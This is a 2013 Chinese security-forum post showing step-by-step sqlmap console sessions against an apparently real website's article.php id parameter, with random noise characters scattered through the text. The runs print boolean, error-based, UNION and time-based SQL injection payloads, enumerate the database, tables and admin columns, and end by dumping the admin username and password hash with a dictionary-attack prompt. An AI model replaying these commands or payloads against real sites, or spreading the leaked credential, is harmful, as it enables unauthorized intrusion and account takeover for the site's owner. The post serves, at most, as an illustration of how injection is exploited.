找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2428|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% k& `4 o$ O3 J) hms "Mysql" --current-user       /*  注解:获取当前用户名称
3 H+ u9 z9 O7 `& A1 Q    sqlmap/0.9 - automatic SQL injection and database takeover tool$ N0 I- T, P7 |& i& ]3 r% x. v
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54& ^" s, }4 O# f9 O! N0 r! g
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as9 H/ x; |( t6 c
    session file
    1 ?7 b! F5 F  U- I) `% o* M' Z3 u[16:53:54] [INFO] resuming injection data from session file6 Z- M1 _7 J6 J1 H+ r) |
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: r- F" M+ U/ B2 _
    [16:53:54] [INFO] testing connection to the target url
    & x# X/ E4 W; W0 T& r8 P! Ksqlmap identified the following injection points with a total of 0 HTTP(s) reque
    9 l2 F; Q7 i3 @* B3 qsts:9 e+ [. X! w8 E( I6 I) R3 g
    ---0 L+ n( N6 q) _9 `& I, X
    Place: GET
    3 F5 M6 u( @3 t4 s! cParameter: id
    ( y! W* W) S) Z    Type: boolean-based blind9 V' _( A. V+ H1 C* s% X
        Title: AND boolean-based blind - WHERE or HAVING clause
    " j+ \- b  O4 C3 k    Payload: id=276 AND 799=799& V; D# W" f! I, |
        Type: error-based( i$ u0 f* r% g/ [) P# l, N4 D
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ _( j" W9 |. J( ]8 P$ h
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ O# I% u$ z. M1 ]
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! o* B0 L9 d+ J5 C+ b! W4 J- Z3 x
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 K5 u/ R3 L1 `) r# B; F( }0 A% `
        Type: UNION query4 {6 S4 I/ f, V* B
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ! Z7 g$ A4 V; T5 q4 ]* z    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, F1 g* G! c& ]$ l: D4 C2 P
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( x+ c4 w0 Q, e. G6 ~
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- j4 v2 u9 D" P9 o1 F. y9 F
        Type: AND/OR time-based blind
    9 a* [# H$ h3 G+ W    Title: MySQL > 5.0.11 AND time-based blind
    2 R6 j7 S, R# d    Payload: id=276 AND SLEEP(5)
    . c2 C. X# [9 v) u( ?+ W---
    6 B: z# ?- Y) V/ T- T7 s[16:53:55] [INFO] the back-end DBMS is MySQL0 t' a& a1 r% B4 n+ m: K
    web server operating system: Windows" M' A0 d% A2 c) h( A. C
    web application technology: Apache 2.2.11, PHP 5.3.0
    # _8 y4 m) O' @# ?- xback-end DBMS: MySQL 5.0
    " a. X! u( e) E* J+ L% q[16:53:55] [INFO] fetching current user; a8 E5 _8 Y) z7 ~( [  F
    current user:    'root@localhost'   . ~$ x# M6 b# X/ D2 |
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 ?; U4 {" Q& E4 L
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    + ~1 d( e" G. |& b! ~
    - Q: ^+ n( |) S: `2 JD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    5 L' M' ^$ ^6 ]4 b* Cms "Mysql" --current-db                  /*当前数据库
    5 ]' w* [5 _% j4 n" Z, K& `    sqlmap/0.9 - automatic SQL injection and database takeover tool! k7 S& V' @3 @; s
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    9 h& D( E5 X; `4 z' H& u[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ( G* w# y9 @' p  h+ [2 n& ^ session file
    ( f' C9 i9 ]6 p- [3 V[16:54:16] [INFO] resuming injection data from session file2 U; F0 Q' d4 j
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file7 Z% ~# i6 v$ f9 }/ ~1 H$ g
    [16:54:16] [INFO] testing connection to the target url0 g- K3 Q( u  a2 a
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque! h/ b# W7 a# ?5 y+ F
    sts:2 R4 J( Q, F: R* x; M
    ---
    4 p2 `0 r& y: ?. Z7 i/ ^Place: GET: L# E' H4 k0 q
    Parameter: id
    $ u" W4 Z; r# l" ^, b    Type: boolean-based blind8 k  l5 @& H$ [5 I) @/ }: ~& R
        Title: AND boolean-based blind - WHERE or HAVING clause  D; j, ^; B( y3 m, }
        Payload: id=276 AND 799=799
    - ]$ u  X' L) I: g2 t+ {    Type: error-based. E  C: t% a) V5 O; ~$ P- X9 H
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# q# a5 r" m# U* Q# |4 \
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; _1 R; |; z9 u3 G- T1 X
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    * _! F  C! n9 y+ O# [. T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
      n4 I: H& R- M5 r    Type: UNION query6 C) w6 v, c  C5 Q8 I4 W6 J
        Title: MySQL UNION query (NULL) - 1 to 10 columns' K7 D0 ~& ^8 S  |' ?7 V6 @7 p
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- [$ E9 w/ ]! U' ^+ t) w# G
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ i# c& i9 m: X0 `9 V# y% n$ V
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- `) i0 A: r; N4 J* R9 T
        Type: AND/OR time-based blind/ X5 g; M2 I0 A$ O; A1 o" A
        Title: MySQL > 5.0.11 AND time-based blind" i7 s% E% k8 Y+ B" E; m1 Q
        Payload: id=276 AND SLEEP(5)
    4 C7 v( |. i+ j/ n---$ R" W2 K; }8 j) n  g4 R
    [16:54:17] [INFO] the back-end DBMS is MySQL
    . ^5 a% o( r# o0 ~5 g( Z! `web server operating system: Windows
    0 K( I) _( j0 pweb application technology: Apache 2.2.11, PHP 5.3.0( M' X  `% ]; v$ R7 g; r/ C
    back-end DBMS: MySQL 5.0, P& y( C6 d3 K: w. U7 y' n5 c
    [16:54:17] [INFO] fetching current database" }$ e# U; r5 m" E( f9 {
    current database:    'wepost'
    ) s+ E! _4 p2 U3 [6 a: D' G[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; W; B* j. s- k, ?
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    , q- z9 H/ t( \" u& ED:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 R# Y# c9 R1 j- ?/ F+ n( }% v" P
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    8 x) Q+ n  {/ {( R    sqlmap/0.9 - automatic SQL injection and database takeover tool/ @, ]' t7 q0 V; j
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    " o5 d+ Z8 ^3 r3 I& Y) \# \0 t[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    / V+ g6 S9 D/ _ session file
    + B/ _/ K( b+ l8 T+ x1 z, L( Y5 L[16:55:25] [INFO] resuming injection data from session file
    2 |5 Q0 s5 P* x" p$ l! b[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    5 T3 A! l% X+ _5 u[16:55:25] [INFO] testing connection to the target url
    ' O$ l3 I" U9 K: f' ?4 f  Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ! M$ x0 k/ E0 U3 H- j  ~sts:
    3 \# g' J2 g7 _0 \( q  p) I7 ]---& Z! c( R  s. |; K4 Z
    Place: GET
    ( M. i2 M1 Y6 jParameter: id
    + _  C2 n- d7 m/ F    Type: boolean-based blind7 d' D2 z0 W& V( j" f0 ]
        Title: AND boolean-based blind - WHERE or HAVING clause
    % i* _6 `' m9 u7 c' w: `8 w* T    Payload: id=276 AND 799=799
    # ?" l3 H/ A0 |    Type: error-based
    0 ]" P/ V2 Q/ n" h. p    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    " x# P% K; }/ K0 C% m    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 Z( T' j  ]- o5 ^3 \# n6 n& y
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    - h9 j3 c4 l/ m4 R" R) ^, n! _),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 V1 S  f) X# ^) {
        Type: UNION query
    $ G8 ?5 b- R( W" z    Title: MySQL UNION query (NULL) - 1 to 10 columns) o- P" r9 F2 C6 j" ]
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ; n" T. l2 g- k, J& X$ X% @8 `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    + ~- D& T( F6 ~( G$ O+ zCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    & i1 H& i6 O" d/ R$ ]1 B    Type: AND/OR time-based blind
    . P, }2 u+ T8 \, ?$ d  B% `    Title: MySQL > 5.0.11 AND time-based blind
    ! P$ A$ X, h- L# s0 y; d2 @$ `    Payload: id=276 AND SLEEP(5). `/ N5 @9 n; j% v6 f* H# Q# U' W
    ---9 I/ o! }$ I  C. ]- `
    [16:55:26] [INFO] the back-end DBMS is MySQL
    ) d- h" t: L: Z* |) _' @. yweb server operating system: Windows
    ' s$ a" y) q7 hweb application technology: Apache 2.2.11, PHP 5.3.0
    7 m: E0 H1 v$ C9 H8 I: k- Kback-end DBMS: MySQL 5.0
    7 a: [& F" ^& Q- a[16:55:26] [INFO] fetching tables for database 'wepost'5 z2 x$ b& h, J
    [16:55:27] [INFO] the SQL query used returns 6 entries5 k, W) F% Y' a  W# y. ^
    Database: wepost
      q. C! J: w& M% m( C$ H4 I[6 tables]
    3 E4 U, J- `& L$ T" `- k+-------------+
    / l5 @5 X4 L& R& {( L( A+ z| admin       |% C- F6 r! V' _( d7 P2 L/ @
    | article     |
    ' a; J5 V& M2 `' T- S| contributor |3 g' [; I: S+ s! U
    | idea        |
    7 C6 C# f1 }2 n( k" p1 d| image       |
    ; ~! j3 C* c, J- T, Z  E| issue       |! o/ w; b( a5 d9 w3 L
    +-------------+4 G$ C" w: {) k2 ^% D! \2 g$ ?; w
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ W! }! L, @, j0 U: F7 ?' t
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    6 [- n- I) L% q. f
    3 {' F2 \# Q# c5 ~D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# m- }& t; {- C. o
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    5 t$ c* g/ f; r- ]; F7 U+ [  K" h1 Z' ?    sqlmap/0.9 - automatic SQL injection and database takeover tool& C0 p' K( o, H- A
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06& l) {9 f3 m1 @, [* q
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    . [: R: f3 h( o; [' e) K) S- Csts:
    , {" o, B+ ?; q) e- B# r---3 l. S+ y# D/ v9 G" a& W+ l- a
    Place: GET8 o; G. I* B+ Y0 _* B' H/ R0 ~0 |: @
    Parameter: id
    $ m. T# {' h" }& k" R0 F    Type: boolean-based blind3 k- u+ J2 H! e/ q
        Title: AND boolean-based blind - WHERE or HAVING clause9 w. o9 T1 I2 F% ^+ T$ d, L
        Payload: id=276 AND 799=799
    " D' |% p) Z* y4 y& t+ f: X- E    Type: error-based/ m7 M. ?( D6 Z0 @  P
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    - o) H5 B- F, [    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ p" ]- }2 D3 F  \( {
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    1 _. F- Q2 o$ F- K/ g5 S6 j* i),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    , M3 M3 O0 S3 J    Type: UNION query
    5 O; N, v0 `$ i/ d% Y3 T3 R5 K    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ' E* U6 T  s& a/ Y    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ( h% I! u: [+ R2 a& ], i- `- v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. j' j- n. Q4 z: Z0 P" a. D
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    # M) m! M9 O% @6 \0 O7 p    Type: AND/OR time-based blind
    " w) \" t7 `6 I* V! M3 k$ \    Title: MySQL > 5.0.11 AND time-based blind! k( k! K5 y$ C# B
        Payload: id=276 AND SLEEP(5)
    # B: T- h2 Y$ s- m" i) r* x! _---  w2 @! g6 j4 B
    web server operating system: Windows
    2 B' d9 `. ^9 M, ^6 Jweb application technology: Apache 2.2.11, PHP 5.3.0
    ; y( h& j  O. |# ]7 d) I) G9 {3 Vback-end DBMS: MySQL 5.0; O4 b- r: R& ]$ K6 D; ]% t7 P# z
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se2 c6 v- s9 d7 A. y" U
    ssion': wepost, wepost
    / u( x- E2 b, WDatabase: wepost
    - L2 `# p9 P$ P6 _* {: f6 eTable: admin
    5 f/ _0 @% o* ^+ d8 G5 O& _4 H[4 columns]
    : h0 u, x5 g% V+ F$ G% w2 H+----------+-------------+
    ; X1 u+ Z+ W8 O# ^) H4 B| Column   | Type        |! l  }. F' S, U- ^6 _0 o! C0 j
    +----------+-------------+
    ( Z+ E. F) q: v5 `7 C| id       | int(11)     |
    7 S" _+ p( R2 q$ ~# [; w- {4 R0 x" y| password | varchar(32) |. F6 y" Z3 u. q" m5 T/ U4 w
    | type     | varchar(10) |3 n& o4 C- U  _- w- j. H+ h
    | userid   | varchar(20) |
    ) g" T+ n% U% K  ~4 Z+----------+-------------+
    $ x+ v" k! Z' i# G
  • shutting down at: 16:56:19
    ! U6 A0 @- I6 `/ b/ h2 i
    / [4 q' o9 _- F5 h9 LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 ?* c+ O4 D7 k1 h% L1 L- b
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    7 [, N" L) O5 O/ ^( {/ z    sqlmap/0.9 - automatic SQL injection and database takeover tool
    + z( o2 ^* k  w    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    3 _3 E$ G; U3 ]  \& ^2 psqlmap identified the following injection points with a total of 0 HTTP(s) reque
    8 d' e; R- }4 f4 g! W! }  bsts:; a' W8 A9 u9 ?5 @
    ---1 K( _0 w4 B3 a7 w! `: M
    Place: GET& n1 k# S/ T, K8 i( X  M8 T5 Q- h
    Parameter: id  O$ X7 s4 X) A  a. G$ c8 Z2 O
        Type: boolean-based blind
    , v* ?3 Q- Q( {. K  @: h" S    Title: AND boolean-based blind - WHERE or HAVING clause; @) I0 }7 {% y$ ^, l
        Payload: id=276 AND 799=7999 Y1 ?& M3 G# z8 B$ J3 r
        Type: error-based
    ) k, }% }' C: N9 c    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause  z4 d9 U9 P# @; S" m
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 E8 E/ T9 {# G" M4 D! U# d120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ) w* \: f+ S' w),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 r+ @0 v+ `4 _2 h& @
        Type: UNION query
    9 ^$ }8 ^# i6 Q) [0 p    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ; O% [' O$ I& M9 C; j) V$ X    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    % {+ v8 t# B& B- F$ ](58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    & [" [1 [- }1 [0 ^1 C6 @' j0 YCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 J- c: k1 H; y% b8 ^& l
        Type: AND/OR time-based blind
    ! @0 k+ q  y; C3 r5 c7 A    Title: MySQL > 5.0.11 AND time-based blind/ R- \' y) C( y  l% @! ], R# g
        Payload: id=276 AND SLEEP(5)
    9 q& Q: \: h6 A% q$ N- E# t* k---
    5 ^! s6 \% p) z& C2 g, u& [9 G1 N' [web server operating system: Windows& s$ O& Z: o$ Z: G; ]- y
    web application technology: Apache 2.2.11, PHP 5.3.0
      a6 T3 D5 g- v+ x6 r* Sback-end DBMS: MySQL 5.08 L- V( u9 d# g2 K3 `0 ~! W1 K# C; X
    recognized possible password hash values. do you want to use dictionary attack o% \+ `$ W4 k+ N* x2 T, ^6 ^
    n retrieved table items? [Y/n/q] y
    + g& s* E; G8 X  V# X7 R9 Y/ ewhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]  b5 V' V5 y' x: ]3 N0 r
    do you want to use common password suffixes? (slow!) [y/N] y
    ! d/ K: l5 z) qDatabase: wepost* A+ I5 }- W* D' \) C# c- |
    Table: admin
    : m5 K* z6 G# G# s+ e: w) R9 E[1 entry]
    8 t( ~+ a/ p% j2 n+ B4 B0 v+----------------------------------+------------+
    4 ?2 I9 P, A/ N7 \; p/ x2 X| password                         | userid     |0 ~' [! W) M/ k
    +----------------------------------+------------+$ Q' }5 Z7 W5 ?5 C8 }; _
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |# X. @6 p0 D4 X7 F! L8 U. E
    +----------------------------------+------------+
    ; Y( Y3 P: a- \4 c0 _
  • shutting down at: 16:58:14/ F0 Y/ f$ ?; T5 q# ?; N
    9 n$ f9 ?& Q. @- A1 W, c
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表